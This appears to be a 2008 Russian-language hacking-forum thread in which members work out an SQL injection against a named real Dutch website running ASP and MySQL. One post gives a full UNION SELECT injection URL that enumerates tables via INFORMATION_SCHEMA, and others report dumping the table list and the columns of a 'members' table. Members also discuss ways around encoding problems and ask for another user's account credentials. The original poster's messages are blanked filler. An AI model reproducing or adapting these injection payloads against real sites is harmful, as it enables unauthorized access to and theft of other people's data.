asp+mysql5 inject problem

Discussion in 'Уязвимости' started by xena-mil1, 8 Jan 2008.

  1. xena-mil1

    xena-mil1 Elder - Старейшина

    Joined:
    17 Oct 2006
    Messages:
    13
    Likes Received:
    21
    Reputations:
    0
    jjj

    jjjjj
     
    #1 xena-mil1, 8 Jan 2008
    Last edited: 29 Aug 2008
  2. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Такого точно быть не может, но некоторые рукожопые программисты делают Join и до большего числа полей...

    Ну теоретически можно завязаться на перебор с помощью Substr... Но оно тебе нужно? А вообще, Union на то и нужен чтобы в результирующую выборку добавить свой запрос и получить вывод необходимых тебе данных...

    А насчёт инъекции - тут урла нужна... Фактически там может быть какой-нибудь хитрый фильтр, или нужно правильно закрыть условие запроса с помощью скобок... А возможно там ничего и не сделать... Например, вывод даёт второй запрос, а у тебя не проходит первый запрос и на этом работа паги завершается...
     
  3. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    На mssql лучше использовать or, кроме того, там можно спользовать точку с запятой для разделения запросов. КОроче, читай статью [ cash ]

    зы только сейчас понял, что там не mssql, извиняюсь, ступил.
     
    #3 Macro, 8 Jan 2008
    Last edited: 8 Jan 2008
  4. xena-mil1

    xena-mil1 Elder - Старейшина

    Joined:
    17 Oct 2006
    Messages:
    13
    Likes Received:
    21
    Reputations:
    0
    ddf
     
    #4 xena-mil1, 8 Jan 2008
    Last edited: 29 Aug 2008
  5. spider-intruder

    spider-intruder Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    700
    Likes Received:
    339
    Reputations:
    37
    Ты там регался? Дай учетку.
     
  6. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Пока могу сказать что 99 полей...

    Code:
    http://www.contactwereld.nl/weergave.asp?ben=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,CAST(TABLE_NAME+AS+BINARY),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99+FROM+INFORMATION_SCHEMA.TABLES/*
    Только что-то с кодировкой...
     
    #6 groundhog, 8 Jan 2008
    Last edited: 8 Jan 2008
  7. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    похоже багу закрыли... Редиректит на другую страницу :(
     
  8. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Ничего не закрыли. Проблемы с кодировкой решаются через AES_DECRYPT...

    Вот все табы в базе:
    Вот все поля таблицы 'members':
    В скандинавских языках я не силён, поэтому со значениями полей разбирайтесь сами... Благо в выводе присутствует большое число полей...
     
    #8 groundhog, 8 Jan 2008
    Last edited: 8 Jan 2008
    1 person likes this.
  9. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    хм, странно, при любом обращении к скрипту weergave.asp, меня редиректит на _http://www.contactwereld.nl/aanmelden.asp
    в чем может быть проблема?
     
    #9 [aywo], 8 Jan 2008
    Last edited: 8 Jan 2008
Loading...